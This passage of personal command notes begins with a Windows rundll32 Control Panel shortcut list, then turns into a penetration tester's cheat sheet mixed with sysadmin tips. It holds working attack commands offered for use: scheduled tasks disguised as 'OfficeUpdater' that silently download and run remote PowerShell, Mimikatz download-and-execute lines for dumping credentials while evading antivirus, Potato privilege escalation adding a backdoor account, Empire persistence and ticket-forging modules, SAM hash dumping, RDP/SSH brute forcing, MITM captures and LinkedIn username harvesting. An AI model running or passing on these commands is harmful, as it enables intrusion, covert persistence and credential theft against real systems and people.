757 rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,3
758
759Multimedia Properties (Advanced/Devices):
760
761 rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl,,4
762
763Sounds Properties:
764
765 rundll32.exe shell32.dll,Control_RunDLL mmsys.cpl @1
766
767Modem Settings (MODEM.CPL)
768Modem Properties (General):
769
770 rundll32.exe shell32.dll,Control_RunDLL modem.cpl
771
772Network Settings (NETCPL.CPL / NCPA.DLL)
773Network (Configuration):
774
775 Win9x: rundll32.exe shell32.dll,Control_RunDLL netcpl.cpl
776 WinNT: rundll32.exe shell32.dll,Control_RunDLL ncpa.cpl
777
778Dial-up Networking Wizard
779
780 Win9x: rundll32.exe rnaui.dll,RnaWizard
781
782Create Share Dialog
783
784 WinNT: rundll32.exe ntlanui.dll,ShareCreate
785
786Manage Shares Dialog
787
788 WinNT: rundll32.exe ntlanui.dll,ShareManage
789
790ODBC Settings (ODBCCP32.CPL)
791ODBC Data Source Administrator (General):
792
793 rundll32.exe shell32.dll,Control_RunDLL odbccp32.cpl
794
795Password Settings (PASSWORD.CPL)
796Password Properties (Change Passwords):
797
798 Win9x: rundll32.exe shell32.dll,Control_RunDLL password.cpl
799
800COM Ports Settings (PORTS.CPL)
801COM Ports Properties (General):
802
803 WinNT: rundll32.exe shell32.dll,Control_RunDLL ports.cpl
804
805Server Properties (SRVMGR.CPL)
806Server Properties (General):
807
808 WinNT: rundll32.exe shell32.dll,Control_RunDLL srvmgr.cpl
809
810System Settings (SYSDM.CPL)
811System Properties (General):
812
813 rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,0
814
815System Properties (Device Manager):
816
817 Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
818
819System Properties (Performance):
820
821 Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
822 WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,1
823
824System Properties (Environment):
825
826 WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
827
828System Properties (Startup/Shutdown):
829
830 WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,3
831
832System Properties (Hardware Profiles):
833
834 Win95: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,2
835 WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,4
836
837System Properties (User Profiles):
838
839 WinNT: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl,,5
840
841Add New Hardware Wizard:
842
843 Win9x: rundll32.exe shell32.dll,Control_RunDLL sysdm.cpl @1
844
845Add New Printer Wizard:
846
847 Win9x: rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL AddPrinter
848
849Telephony Settings (TELEPHON.CPL)
850Dialing Properties (My Location / Drivers):
851
852 WinNT: rundll32.exe shell32.dll,Control_RunDLL telephon.cpl
853
854Themes Settings (THEMES.CPL)
855Themes Properties (General):
856
857 rundll32.exe shell32.dll,Control_RunDLL themes.cpl
858
859Time and Date Settings (TIMEDATE.CPL)
860Date/Time Properties:
861
862 rundll32.exe shell32.dll,Control_RunDLL timedate.cpl
863
864Choose Time Zone:
865
866 rundll32.exe shell32.dll,Control_RunDLL timedate.cpl,,/f
867
868TweakUI Settings (TWEAKUI.CPL)
869TweakUI Dialog (General):
870
871 rundll32.exe shell32.dll,Control_RunDLL tweakui.cpl
872
873UPS Settings (UPS.CPL)
874Uninteruptable Power Supply Properties (General):
875
876 WinNT: rundll32.exe shell32.dll,Control_RunDLL ups.cpl
877
878Microsoft Mail Postoffice Settings (WGPOCPL.CPL)
879Microsoft Workgroup Postoffice Admin:
880
881 rundll32.exe shell32.dll,Control_RunDLL wgpocpl.cpl
882
883Miscellaneous File System Dialogs and Wizards
884Open With (File Associations):
885
886 rundll32.exe shell32.dll,OpenAs_RunDLL d:\path\filename.ext
887
888Run Diskcopy Dialog:
889
890 rundll32 diskcopy.dll,DiskCopyRunDll
891
892Create New Shortcut Wizard:
893
894 rundll32.exe AppWiz.Cpl,NewLinkHere %1
895 (creates shortcut at location specified by %1)
896
897Create a Briefcase:
898
899 rundll32.exe syncui.dll,Briefcase_Create
900
901View Fonts:
902
903 rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL FontsFolder
904
905View Printers:
906
907 rundll32.exe shell32.dll,SHHelpShortcuts_RunDLL PrintersFolder
908
909I've also posted a text version of this information which you may find handy (you can find shellcpl.txt on Karl's site).
910
911Again, please send me an e-mail if you find any additional codes that I could add to this list!
912Copyright ©1995-98, Karl E. Peterson, All Rights Reserved Worldwide
913
914
915
916#wget ...NOT
917aria2c --file-allocation=none -c -x 4 -s 4 -d "./" "$1"
918
919
920# powershell
921PowerShell -ExecutionPolicy ByPass -file Policy_Script_powershell.txt
922
9232. Set-ExecutionPolicy Unrestricted Or Set-ExecutionPolicy RemoteSigned
924
925
926# block re-tweets twitter block from debug console for firefox
927https://twitter.com/operat0r/following
928
929a=Array.prototype.slice.call(document.querySelectorAll("div.ProfileCard-content div.dropdown"));
930a.forEach(function(e) {e.querySelector("button").click(); e.querySelector("li.retweet-off-text button").click(); })
931
932
933# psexec new hotness
934https://byt3bl33d3r.github.io/getting-the-goods-with-crackmapexec-part-1.html
935
936# skip fstab errors on boot it also looks like you can use 'auto' insted of ext4
937
938/dev/sdb1 /media/4TB_B ext4 defaults,nobootwait 0 1
939/dev/sdc1 /media/1TB ext4 defaults,nobootwait 0 1
940
941# dump users
942import-module activedirectory
943get-aduser -ldapfilter "(&(&(samaccountname=*)(useraccountcontrol=512)))" -Properties * |select name,givenname, sn,enabled,EmailAddress,AccountExpirationdate,"passwordlastset" | export-csv -path c:\test.csv
944start c:\test.csv
945
946# pull the MAC from dump and split it up for use with nmap-mac-prefixes replace 54:B6:20:00:00:00 with 54B620 000000
947sed -r "s/(..):(..):(..):(..):(..):(..)/\1\2\3 \4\5\6/g"
948cat ../../nmap-mac-prefixes | sed -r "s/(......) /\1,/g" > ../../nmap-mac-pre
949fixes.csv
950
951
952#Want to turn off Retweets from all users you're following without clicking each time? This script sorts that, using a timer to avoid your requests being blocked and returning a 403. Scroll to the bottom of your Following list, paste it into Chrome's console
953
954a=Array.prototype.slice.call(document.querySelectorAll("div.ProfileCard-content div.dropdown"));
955a.forEach(function(e) {e.querySelector("button").click(); e.querySelector("li.retweet-off-text button").click(); })
956
957var interval=setInterval(function(){
958 $('.user-actions.including .retweet-off-text').last().click();
959 if ($('.user-actions.including .retweet-off-text').length<1) {
960 clearInterval(interval);
961 }
962},20000);
963
964
965# ugh unicornscan.. udp fast
966unicornscan -mU -Ir 1000 20.0.0.1:a -v
967
968#john 1337 some place on VM's john.conf file .. ?
969
970l /a /e /l /o /s sa4 se3 sl[1|] so0 ss5
971l /a /e /l /o /s sa@ se3 sl1 so0 ss[$5]
972
973
974
975# MongoDB notes
976mongodump --host 127.0.0.1
977mongo HOSTNAME --eval "printjson(db.getCollectionNames())"
978
979show dbs
980use DB
981db.getName()
982db.getCollectionNames()
983
984
985
986service mongod start
987
988# more masscan
989masscan -p80,8000-8100 10.0.0.0/8
990masscan -p0-65535 --rate 150000 -oL output.txt
991
992masscan -p0-65535 23.239.151.0/24 --rate 150000 -oL output.txt
993
994# playback conf
995/masscan -p0-65535 23.239.151.0/24 --rate 150000 -oL output.txt --echo > scan.conf
996/masscan -c scan.conf
997
998masscan --ports 80,443,22,445,135,139,5900,5800,5901,5801,8080 --rate 150000 -oL 172_masscan_common.txt 172.16.0.0/12
999
1000
1001masscan -p21,22,23,25,53,80,88,110,111,113,135,139,143,220,264,389,443,445,449,524,585,636,993,995,1433,1521,1723,3306,3389,5900,8080 --rate=14114 --open --excludefile BLACKLIST --ping 172.16.0.0/12 -oX 172.xml
1002
1003
1004
1005# idea for new and improved smart nmap ? just worry about the last oct guessing .. so .1 .2 .254 .10 .100 etc..
1006nmap --max-retries 1 --min-parallelism 100 172.16-31.0-255.1,2,3,4,5,10,20,30,100,254 -sV -oA 172_sV_GUESS --top-ports 20 -T5
1007nmap --max-retries 1 --min-parallelism 100 10.0-255.0-255.1,2,3,10,20,30,100,254 -sV -oA 10_sV_GUESS --top-ports 20 -T5
1008
1009
1010# potato PO TAT O ! !!!!!!!!!!!!!!!!!!!!!
1011Potato.exe -ip 25.0.0.151 -cmd "c:\\windows\\system32\\cmd.exe /k net user add SUCKITGARY 123QWE#"
1012
1013
1014# you know ...
1015
1016#(X86) - On User Login
1017schtasks /create /tn OfficeUpdaterA /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System
1018
1019#(X86) - On System Start
1020schtasks /create /tn OfficeUpdaterB /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onstart /ru System
1021
1022#(X86) - On User Idle (30mins)
1023schtasks /create /tn OfficeUpdaterC /tr "c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30
1024
1025#(X64) - On User Login
1026schtasks /create /tn OfficeUpdaterA /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onlogon /ru System
1027
1028#(X64) - On System Start
1029schtasks /create /tn OfficeUpdaterB /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onstart /ru System
1030
1031#(X64) - On User Idle (30mins)
1032schtasks /create /tn OfficeUpdaterC /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'IEX ((new-object net.webclient).downloadstring(''http://192.168.95.195:8080/kBBldxiub6'''))'" /sc onidle /i 30
1033
1034# armitage script for fvwm-crystal / PTF
1035cat /usr/local/sbin/armitage
1036
1037cd /opt/armitage
1038
1039cat <<EOF> /tmp/armitage_rc
1040
1041export PATH="$PATH:/pentest/exploitation/metasploit"
1042export MSF_DATABASE_CONFIG="/opt/database.yml"
1043FvwmCommand Style "*" Lenience
1044cd /opt/armitage/
1045./armitage
1046
1047EOF
1048
1049chmod -R 755 /tmp/armitage_rc
1050screen -fa -d -m /tmp/armitage_rc
1051
1052
1053
1054#horrid way to json to csv to find sploits or something .. I gave up
1055for i in `ls` ;do echo $i;cat $i; done | sed 's/^CVE/BREAKCVE/g' |sed 's/^}CVE/BREAKCVE/g'|egrep -v '(\"summary\")' |sed 's/,/ /g'| egrep -ia '(BREAKCVE|url|exploit|summery|title)' | tr -d '\n' | awk '{gsub("BREAKCVE","\nCVE"); print}'| sed 's/{/,/g' | sed 's/ //g' >out.csv
1056
1057
1058vfeed example
1059wget 'https://vfeed.dpdcart.com/fulfillment/download?fulfillment_id=13684802&fulfillment_file_id=9878428&filename=vfeed.db.tgz&purchase_id=9771223&salt=8f38a08adc295eea2a21d9e64342304f9ab11992'
1060git pull -f
1061./vfeedcli.py -m get_cve CVE-2015-0240
1062
1063./vfeedcli.py -m json_dump CVE-2015-1761 | egrep -ia '(url|exploit|summary|title)'
1064
1065
1066here is a link to some of my main wordlist:
1067
1068https://www.amazon.com/clouddrive/share/uBt6kSsUNLUmVl7aqLB5kDC7iJ8zx4eaxVgkar8Mhqw?ref_=cd_ph_share_link_copy
1069
1070_18_in_1: is about 40gigs uncompressed
1071found_2015.txt and 2016: are more recent dumps http://hashes.org/crackers.php
1072
1073
1074reversing and firmware (IOT)
1075
1076https://security.googleblog.com/2016/03/bindiff-now-available-for-free.html
1077
1078firmware stuff
1079http://wiki.securityweekly.com/wiki/index.php/Reverse_Engineering_Firmware_Primer
1080https://github.com/mirror/firmware-mod-kit
1081
1082
1083# bettercap MITM HSTS
1084bettercap --proxy -P POST
1085
1086# ettercap duh ..
1087
1088ettercap -w try1.pcap -T -M ARP /TARGET// /// -P autoadd
1089
1090
1091# tcpdump with some flags
1092
1093tcpdump -i <interface> -s 65535 -w <some-file>tcpdump -i <interface> -s 65535 -w <some-file>
1094
1095
109612:35 < SyncYourDogmas> tcpdump -qns 0 -A -r -
1097
1098# dump URL with ip src and dst
1099tshark -nr dump.pcap -E separator=, -R "http.request.uri " -T fields -e frame.number -e frame.time -e ip.src -e ip.dst -e text
1100
1101# dont use ....stupid hex outputwith \r in it dump some decoded info and the packet data in hex ascii
1102tshark -PVx -r dump.pcap -T text
1103
1104# Ubuntu auto updates
1105apt-get update
1106apt-get install unattended-upgrades -y
1107dpkg-reconfigure --priority=low unattended-upgrades
1108# set Reboot to true
1109vi /etc/apt/apt.conf.d/50unattended-upgrades
1110unattended-upgrades
1111
1112
1113# ubuntu aunattended rel upgrades
1114do-release-upgrade -f DistUpgradeViewNonInteractive
1115
1116
1117# CentOS ... LVM/XFS resize
1118lvextend -l 100%VG /dev/mapper/centos-root
1119This one extends the filesystem while booted
1120xfs_growfs /
1121
1122# rdp and ssh brute
1123ncrack -p rdp -u administrator --pass 'password' -iL in2
1124ncrack -p ssh -u root --pass 'root' -iL in
1125
1126#iftop config
1127cat << EOF > ~/iftop.conf
1128max-bandwidth: 10M
1129port-display: on # Controls display of port numbers.
1130port-resolution: yes # Controls conversion of port numbers to service names
1131screen-filter: not port 22 # filter out yourself
1132EOF
1133
1134iftop -c ~/iftop.conf
1135
1136
1137
1138#plex traffic shape
1139
1140modprobe sch_htb
1141/sbin/tc qdisc del dev eth0 root
1142/sbin/iptables -D OUTPUT -t mangle -p tcp --sport 32400 '!' --dst 25.0.0.0/8 -j MARK --set-mark 10
1143/sbin/tc qdisc add dev eth0 root handle 1: htb default 20 r2q 50
1144/sbin/tc class add dev eth0 parent 1: classid 1:1 htb rate 4mbit ceil 4mbit
1145/sbin/tc class add dev eth0 parent 1:1 classid 1:10 htb rate 2mbit ceil 4mbit
1146/sbin/tc qdisc add dev eth0 parent 1:10 handle 100: sfq perturb 10
1147/sbin/iptables -A OUTPUT -t mangle -p tcp --sport 32400 '!' --dst 25.0.0.0/8 -j MARK --set-mark 10
1148/sbin/tc filter add dev eth0 parent 1: prio 3 protocol all handle 10 fw flowid 1:10
1149
1150## show TC rules
1151/sbin/tc -s -d class show dev eth0
1152## Show iptables mangle rules
1153/sbin/iptables -t mangle -n -v -L
1154## Show actual bandwidth being used on 32400
1155watch -n 1 /sbin/tc -s -d class show dev eth0
1156
1157
1158##KODI XBMC OSD
1159export var1=`df -h | egrep "(\/$|sdb1|sdc1)" | awk '{print $4"|",$6"|"}'|tr -d '\n'`
1160wget --header="Content-Type: application/json" --post-data="{\"jsonrpc\":\"2.0\",\"method\":\"GUI.ShowNotification\",\"params\":{\"title\":\"Disk Space\",\"message\":\"$var1\", \"image\":\"<image path or URL to image here>\"},\"id\":1}" http://localhost:9999/jsonrpc
1161
1162#Wireless Backdoor Creation: Credit http://pwnwiki.io/
1163netsh wlan set hostednetwork mode=[allow\|disallow]
1164netsh wlan set hostednetwork ssid=<ssid> key=<passphrase> keyUsage=persistent\|temporary
1165netsh wlan [start|stop] hostednetwork
1166
1167# empirepowershell
1168
1169set Host rmccurdy.myvnc.com
1170set Name rmccurdy.myvnc.com
1171set Port 443
1172execute
1173list
1174
1175
1176usemodule privesc/powerup/allchecks
1177
1178
1179
1180# disable annoying GWX "Get Windows 10" icon that keeps comming back
1181reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Gwx" /v DisableGwx /t REG_DWORD /d "00000001" /f
1182
1183
1184# linkedin username harvest
1185for i in `seq 1 100`
1186# max 100 pages or 1000 hits ...filter out in 100 page chunks
1187do
1188curl {paste the curl command from burp suite from the 1st page button here and take out the '' from the url and replace with "" so you can put page_num=$i } | awk '{gsub("firstName=","\n"); print}' | grep isAjax= | sed 's/\&isAjax=.*//g' | sed 's/&lastName=/,/g'
1189echo finished $i sleeping
1190sleep 5
1191done
1192
1193
1194# linkedin username cleanup regex http://regexr.com/
1195\+[A-Z]{1,5}%2E|%2E|%2C|\+[A-Z]{2,5}|\+Jr|\-[A-Z]{2,5}|\+%2F|Van\+|van\+|de\+|den\+|%27|\+[A-Z],|De\+|le\+|\-P
1196
1197
1198
1199# popup otify in kodi using webserver enabled API
1200export var1=`df -h | egrep "(\/$|sdb1|sdc1)" | awk '{print $4"|",$6"|"}'|tr -d '\n'`
1201wget --header="Content-Type: application/json" --post-data="{\"jsonrpc\":\"2.0\",\"method\":\"GUI.ShowNotification\",\"params\":{\"title\":\"Title Goes Here\",\"message\":\"$var1\", \"image\":\"<image path or URL to image here>\"},\"id\":1}" http://localhost:9999/jsonrpc
1202
1203#fix nm-applet issues
1204
1205apt-get purge -y hostapd && sudo apt-get purge -y network-manager && sudo apt-get install network-manager
1206
1207# nmap PTH
1208nmap -p U:137,T:139 -script-args -smbuser=mike,smbhash=8846f7eaee8fb117ad06bdd830b7586c. -script=smb-enum-groups -script=smb-enum-users 192.168.52.151
1209
1210# some nse scripts to run on host
1211nmap -oA nse --script discovery,safe,vuln,version 172.16.22.11
1212
1213# danger NMAP!
1214
1215updatedb
1216locate http-slowloris.nse | xargs rm -Rf
1217
1218nmap -sV -oA nse --script-args=unsafe=1 --script-args=unsafe --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)"
1219
1220
1221# Powershell Empire lulz
1222ps
1223psinject PID#
1224
1225usemodule privesc/powerup/allchecks
1226
1227usemodule privesc/gpp
1228
1229usemodule credentials/mimikatz/logonpasswords
1230
1231
1232bypassuac
1233usemodule privesc/bypassuac_wscript
1234usemodule credentials/mimikatz/golden_ticket
1235usemodule credentials/mimikatz/silver_ticket
1236
1237usemodule situational_awareness/network/powerview/share_finder
1238set CheckShareAccess
1239
1240usemodule persistence/userland/registry
1241usemodule persistence/userland/schtasks
1242
1243# CLI searm multi threded downloads
1244apt-get install aria2
1245aria2c --file-allocation=none -c -x 4 -s 4 -d "./" -i FILEWITHURLS
1246
1247
1248# mount samba ...
1249mkdir /media/SSD
1250mount -t cifs "//IP\Open Share" /media/SSD -o username=guest,noexec
1251
1252
1253# monitor HP RAID
1254# https://downloads.linux.hpe.com/SDR/repo/mcp/Debian/dists/trusty/10.40/non-free/binary-amd64/Packages
1255
1256apt-get clean
1257apt-get update
1258
1259apt-get --purge remove hp-health -y
1260apt-get --purge remove hponcfg -y
1261apt-get --purge remove hpacucli -y
1262apt-get --purge remove ssacli -y
1263
1264
1265
1266
1267
1268wget -o add_repo.sh 'https://downloads.linux.hpe.com/SDR/add_repo.sh'
1269bash add_repo.sh -v mcp
1270apt-get update
1271
1272apt-get install hp-health -y
1273apt-get install ssacli -y
1274apt-get install hponcfg -y
1275
1276
1277#hplog -t
1278ssacli ctrl all show status
1279ssacli ctrl all show config
1280
1281
1282ssacli controller all show config detail | grep -A 7 -B 3 Fail | egrep '(Failed|Last|Serial Number|Port)'
1283
1284
1285
1286
1287
1288# dump file list of zip contents
1289FOR /F "tokens=* delims=" %%A in ('dir /b /s *.zip') do (C:\usb\media\7zip\7z.exe l -r "%%A" >> listing.txt)
1290
1291#VeraCrypt mount command line
1292"C:\Program Files\VeraCrypt\VeraCrypt.exe" /letter H /v "D:\VMWARE_DONOTDELETE\VC" /auto
1293
1294# set null password for sudo root and allow null login
1295
1296usermod -p "" administrator
1297cp /etc/pam.d/common-auth /etc/pam.d/common-auth.BK
1298sed 's/nullok_secure/nullok/g' /etc/pam.d/common-auth.BK > /etc/pam.d/common-auth
1299
1300
1301# disable ubuntu update
1302sudo killall update-notifier
1303sudo mv /usr/bin/update-notifier /usr/bin/update-notifier.real
1304echo -e '#!/bin/bash\nwhile :; do /bin/sleep 86400; done' | sudo tee /usr/bin/update-notifier
1305sudo chmod 755 /usr/bin/update-notifier
1306
1307#greenbone opvnvas
1308https://launchpad.net/~mrazavi
1309
1310stall OpenVAS 8 in Ubuntu 14.04 using PPA
1311You can install OpenVAS 8 in Ubuntu 14.04 using this ppa:
1312
1313https://launchpad.net/~mrazavi/+archive/ubuntu/openvas
1314
1315$ sudo add-apt-repository ppa:mrazavi/openvas
1316$ sudo apt-get update
1317$ sudo apt-get install openvas
1318
1319You have to update openvas scripts/data after installation with the following commands:
1320
1321sudo apt-get install sqlite3
1322sudo openvas-nvt-sync
1323sudo openvas-scapdata-sync
1324sudo openvas-certdata-sync
1325
1326sudo service openvas-scanner restart
1327sudo service openvas-manager restart
1328sudo openvasmd --rebuild --progress
1329
1330Login into https://localhost:443 with "admin" as username and password.
1331
1332
1333# Burp Suite (copy as curl command)
1334# remove the -i -s and add -o output.ext
1335curl -i -s -k -X 'GET' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0' -b 'AUTH_rttf3AAAAAAAonce=c54AAAadr6a' 'https://doc-0'
1336
1337
1338
1339# /etc/shadow password 'password' root
1340$6$FV9lt0.l$Yi4d1ayIv48jrcQVAMuIDwchY5Ra7Dmd/ps9IcgiDJBZkQdukPAcoauGNcY5umvb56Kw3e7GZ/HyJJNDCKEZ1/
1341
1342REGEXP FOR CLASS A NETWORKS :
1343(10)(\.([2][0-5][0-5]|[1][0-9][0-9]|[1-9][0-9]|[0-9])){3}
1344
1345REGEXP FOR CLASS B NETWORKS :
1346(172)\.(1[6-9]|2[0-9]|3[0-1])(\.([2][0-5][0-5]|[1][0-9][0-9]|[1-9][0-9]|[0-9])){2}
1347
1348REGEXP FOR CLASS C NETWORKS :
1349(192)\.(168)(\.([2][0-5][0-5]|[1][0-9][0-9]|[1-9][0-9]|[0-9])){2}
1350
1351# CDP SSDP
1352nmap --script broadcast-listener --script-args=broadcast-listener.timeout=60 -oA broadcast_listener
1353
1354# better ?
1355nmap --script discovery --script-args=broadcast-listener.timeout=60 -oA broadcast_listener_discovery
1356
1357#Temporary Switch gateway script:
1358
1359Close all browsers ( DNS cache in browsers ... I know right )
1360Flush DNS cache so we don.t have any DNS issues ... ( or better yet disable DNS caching ... )
1361ipconfig /flushdns
1362
1363Backup current GW settings ..
1364for /f "tokens=2,3 delims={,}" %%a in ('"WMIC NICConfig where IPEnabled="True" get DefaultIPGateway /value | find "I" "') do set GW1=%%~a
1365
1366REM set GW to always tunnel GW ...
1367route delete 0.0.0.0
1368route add 0.0.0.0 mask 0.0.0.0 YOUR_GATEWAY_IP_HERE
1369
1370
1371Check your IP changed
1372start http://rmccurdy.com/ip.php
1373
1374echo Press any key to reset GW back to Default
1375pause
1376
1377ipconfig /flushdns
1378
1379route delete 0.0.0.0
1380route add 0.0.0.0 mask 0.0.0.0 %GW1%
1381
1382#Rename your Wireless adapter to WIFI to set DHCP:
1383netsh interface ipv4 set address name="WIFI" dhcp
1384netsh interface ipv4 set dnsservers name="WIFI" source=dhcp
1385
1386#Set Wireless adapter name to WIFI for static settings for IP, Route and DNS1 and DNS2:
1387netsh interface ipv4 set address name="WIFI" dhcp
1388netsh interface ipv4 set dnsservers name="WIFI" source=dhcp
1389netsh interface ipv4 set address name="LAN" source=static address=10.0.0.XXX mask=255.255.255.0 gateway=10.0.0.1
1390netsh interface ipv4 add dnsserver name="LAN" address=4.2.2.2 index=1
1391netsh interface ipv4 add dnsserver name="LAN" address=198.6.1.2 index=2
1392
1393# dump configs from firewall list using putty and input scripts
1394for i in `cat CHECK_22`
1395do
1396./putty.exe -ssh username@$i -pw passwordgoeshere -m PUTTY_SCRIPT
1397done
1398
1399PUTTY_SCRIPT:
1400enable
1401passwordgoeshere
1402passwordgoeshere
1403more system:running-config
1404
1405<--- bunch of blank spaces here to get around MORE ----->
1406
1407quit
1408exit
1409
1410# zmap scans
1411sed -i 's/^black/#black/' /etc/zmap/zmap.conf
1412zmap -M icmp_echoscan -B 1G -P 1 -T 100 -w net_only_big.txt -o net_only_big.csv
1413zmap -p 80 -B 90MB -P 1 -T 50 -w in -o scope.csv
1414
1415# sort ips logicly and show counts of class C to find host ranges that return all as UP
1416sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 | sed 's/\.[0-9]\{1,3\}$//g' | uniq -c | sort -n
1417
1418# faster nmap
1419nmap -n -sn -PE -T5 --max-retries 1 --min-parallelism 100 -iL scope.txt -oA scope
1420
1421
1422
1423#p0f
1424p0f -i eth0 -p -o ./p0f.log
1425
1426#reboot mac apple
1427shutdown -r now
1428osascript -e 'tell app "System Events" to restart'
1429# shutdown ..
1430osascript -e 'tell app "System Events" to shut down'
1431
1432# sanitize passwords
1433awk 'BEGIN {FS=":"}; {printf "%s:%s%s%s\n", $1, substr($2,0,1), "***", substr($2,length($2),1)}'
1434
1435echo '8846f7eaee8fb117ad06bdd830b7586c:password'|sed 's/^\(.*:.\).*\(.\)$/\1****\2/'
1436
1437
1438# local sam dump via shell hash
1439reg SAVE HKLM\SAM sam
1440reg save HKLM\SYSTEM sys
1441
1442bkhive sys key
1443samdump2 sam key > hash
1444
1445# smb mount ubuntu
1446//servername/sharename /media/windowsshare cifs username=msusername,password=mspassword,iocharset=utf8,sec=ntlm 0 0
1447
1448
1449
1450
1451#autohotkey anti idle moves mouse every 58ish seconds
1452
1453#InstallMouseHook
1454F7::
1455loop, 999 {
1456tooltip, WAKEUPFOOL
1457MouseMove, -1, 0 , 10, R ;around it's starting position
1458sleep,1000
1459tooltip,
1460sleep, 57000
1461}
1462
1463
1464return
1465
1466# unicornscan ..
1467
1468unicornscan -L 10 -R 2 -r 1000 -p 21,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 `cat in`
1469
1470#mimikatz bypass AV dump creds
1471powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"
1472powershell "IEX (New-Object Net.WebClient).DownloadString('http://185.12.45.93/scripts/downloaded/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
1473powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds -ComputerName @('computer1', 'computer2')"
1474
1475# chown chmod for windows run as system or administrator
1476takeown /F "%CD%" /R
1477
1478icacls "%CD%" /GRANT Users:F /T
1479cacls "%CD%" /E /T /C /G Users:F
1480
1481
1482#sexy looking diff thanks to https://github.com/briangerard/my_env
1483function mydiff () {
1484cols=`stty size | awk '{print $2}'`
1485diff --side-by-side --left-column --width=$cols --ignore-all-space $1 $2
1486}
1487
1488#fix windows errors maybe ..
1489run sfc /SCANNOW /OFFBOOTDIR=d:\ /OFFWINDIR=d:\windows
1490
1491# MSSQL HELL
1492Open SQL Server Management studio, right click on the database and choose 'Tasks->Generate Scripts...'
1493
1494Then use the wizard to backup the database. You can script the whole database or parts of it. Two important options: In the 'Advanced' section, you will probably want to ensure 'Type of backup = 'Schema and Data' and the 'Script Statistics' is on.
1495
1496
1497# create CSV of redable files in a path and info on the files using the file() command
1498find . -exec file '{}' \; > /tmp/file.txt
1499sed 's/,/_/g' /tmp/file.txt | sed 's/:/,/g' > file.csv
1500
1501
1502#vmware convert ovf ovftool
1503ovftool RW2\ Dev.ovf what.vmx --skipManifestCheck --skipManifestGeneration
1504
1505#virtual box vbox mount share
1506mkdir /s
1507mount -t vboxsf delete /s/
1508
1509# run cmd.exe as administrator !
1510net user /del samid
1511dsadd user "CN=FIRST LAST,OU=OUGROPNAMEHERE,DC=FISTPARTOFDOMAIN,DC=MIDDLEPART,DC=LASTPART_COMMA_FOR_EACH_DOT_IN_THE_FQDN" -samid SAMID -fn "FIRST" -ln "LAZST" -email FLast@DOMAIN.com -desc "LAST, FIRST" -pwd PASSWORD
1512net group /add "OUGROPNAMEHERE" samid /domain
1513
1514
1515# word press scan notes
1516wpscan.rb --follow-redirection --url TARGET --enumerate vp
1517wpscan.rb --follow-redirection --url TARGET --enumerate vt
1518wpscan.rb --follow-redirection --url TARGET --wordlist 500.txt --username admin
1519wpscan.rb --follow-redirection --url TARGET --enumerate u
1520
1521
1522
1523
1524# Change file timestamp in Windows Sometimes you need to modify a file’s timestamp and don’t want to change the content of the file. Copy command has an easy way to do it:
1525copy /b filename.ext +,,
1526
1527
1528# excell hell
1529
1530# Split long col into 7 equal col
1531Sub SplitIntoCellsPerColumn()
1532Range("B2:H1894").ClearContents
1533 Dim X As Long, LastRow As Long, vArrIn As Variant, vArrOut As Variant
1534 LastRow = Cells(Rows.Count, "A").End(xlUp).Row
1535 numofrows = LastRow / 7
1536 numofrows_rundup = Round_Up(numofrows)
1537 vArrIn = Range("A1:A" & LastRow)
1538 ReDim vArrOut(1 To numofrows_rundup, 1 To Int(LastRow / numofrows_rundup) + 1)
1539 For X = 0 To LastRow - 1
1540 vArrOut(1 + (X Mod numofrows_rundup), 1 + Int(X / numofrows_rundup)) = vArrIn(X + 1, 1)
1541 Next
1542 Range("B2").Resize(numofrows_rundup, UBound(vArrOut, 2)) = vArrOut
1543
1544 Range("A:A").ClearContents
1545
1546End Sub
1547
1548
1549Function Round_Up(ByVal d As Double) As Integer
1550 Dim result As Integer
1551 result = Math.Round(d)
1552 If result >= d Then
1553 Round_Up = result
1554 Else
1555 Round_Up = result + 1
1556 End If
